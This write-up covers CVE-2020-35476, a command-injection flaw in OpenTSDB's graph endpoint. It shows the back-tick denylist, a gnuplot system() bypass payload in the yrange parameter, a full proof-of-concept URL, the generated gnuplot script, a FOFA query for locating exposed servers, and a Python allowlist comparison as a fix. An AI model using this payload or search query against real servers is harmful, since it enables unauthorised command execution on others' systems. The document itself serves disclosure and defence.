# CVE-2020-35476 OpenTSDB 2.4.0 Remote Code Execution

A remote code execution vulnerability was found in the yrange parameter of OpenTSDB 2.4.0 and earlier (other parameters are likely vulnerable as well).

fofa: `title="Opentsdb" || body="opentsdb_header.jpg"`

CVE-2018-12972 used back-ticks for command injection (`o=%60ls%60`). The upstream fix introduced the following check to filter them; it can now be bypassed again.

```java
// TODO - far from perfect, should help a little.
// Only the literal, URL-encoded (%60) and HTML-entity (&#96;) forms of the
// back-tick are rejected; any other gnuplot syntax passes through unchanged.
if (given.contains("`") || given.contains("%60") ||
    given.contains("&#96;")) {
  throw new BadRequestException("Parameter " + param + " contained a "
      + "back-tick. That's a no-no.");
}
```

/src/tsd/GraphHandler.java:

```java
private static String popParam(final Map<String, List<String>> querystring,
                               final String param) {
  // Remove the parameter from the query string and keep its last value.
  final List<String> params = querystring.remove(param);
  if (params == null) {
    return null;
  }
  final String given = params.get(params.size() - 1);
  // TODO - far from perfect, should help a little.
  // Denylist check: rejects back-ticks only, so gnuplot's own functions
  // such as system() are still accepted and written into the plot script.
  if (given.contains("`") || given.contains("%60") ||
      given.contains("&#96;")) {
    throw new BadRequestException("Parameter " + param + " contained a "
        + "back-tick. That's a no-no.");
  }
  return given;
}
```

Bypass payload:

```
[33:system('touch /tmp/poc.txt')]
```

PoC:

```
http://opentsdbhost.local/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system('touch /tmp/poc.txt')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
```
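The popParam() check above only looks for back-ticks, so a gnuplot range containing `system()` is accepted and copied into the plot script. As an added illustration (Python, not OpenTSDB's own Java code; the function names, the regular expression and the sample URL are constructed here), the following compares that denylist with an allowlist that accepts only the `[low:high]` range syntax gnuplot expects, with numeric, blank or `*` bounds:

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample request mirroring the PoC shown on this page.
POC_URL = ("http://opentsdbhost.local/q?start=2000/10/21-00:00:00"
           "&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel="
           "&xrange=[10:10]&yrange=[33:system('touch /tmp/poc.txt')]"
           "&wxh=1516x644&style=linespoint&grid=t&json")

def denylist_backtick(given: str) -> bool:
    """Upstream-style check: True if the value passes (no back-tick found).
    Mirrors the Java logic: literal, URL-encoded and HTML-entity back-ticks."""
    return not any(t in given for t in ("`", "%60", "&#96;"))

# Allowlist for a gnuplot range "[lo:hi]". Each bound may be empty, "*"
# (autoscale) or a plain number. Brackets are required (an assumption
# here, since that is the form gnuplot's "set yrange" takes).
_BOUND = r"(?:\*|-?\d+(?:\.\d+)?(?:[eE][-+]?\d+)?)?"
_RANGE = re.compile(rf"^\[\s*{_BOUND}\s*:\s*{_BOUND}\s*\]$")

def allowlist_range(given: str) -> bool:
    """True only if the value is a syntactically plain numeric range."""
    return _RANGE.fullmatch(given) is not None

def check_query(url: str) -> dict:
    """Evaluate every xrange/yrange value of a /q request under both checks.
    Returns {param: {"denylist": bool, "allowlist": bool}} per parameter."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    verdict = {}
    for name in ("xrange", "yrange"):
        for value in qs.get(name, []):
            verdict[name] = {
                "denylist": denylist_backtick(value),
                "allowlist": allowlist_range(value),
            }
    return verdict

if __name__ == "__main__":
    for param, result in check_query(POC_URL).items():
        print(param, result)
```

The yrange value of the PoC passes the denylist but fails the allowlist; the same allowlist approach applies to any other parameter that is interpolated into the gnuplot script.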

The gnuplot file that OpenTSDB creates in the temp directory looks like this:

```
set term png small size 1516,644
set xdata time
set timefmt "%s"
if (GPVAL_VERSION < 4.6) set xtics rotate; else set xtics rotate right
set output "/tmp/d705ba5b.png"
set xrange ["972086400":"1603641404"]
set format x "%Y/%m/%d"
set grid
set style data linespoint
set key right box
set ylabel ""
set yrange [33:system('touch /tmp/poc.txt')]
plot "/tmp/d705ba5b_0.dat" using 1:2 title "sys.cpu.nice{host=web01, dc=lga}"
```

When OpenTSDB executes mygnuplot.sh, the poc.txt file is written to the temp directory.

References:

* https://github.com/OpenTSDB/opentsdb/issues/2051
* https://xz.aliyun.com/t/2511
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35476
* https://forum.ywhack.com/thread-114835-1-2.html
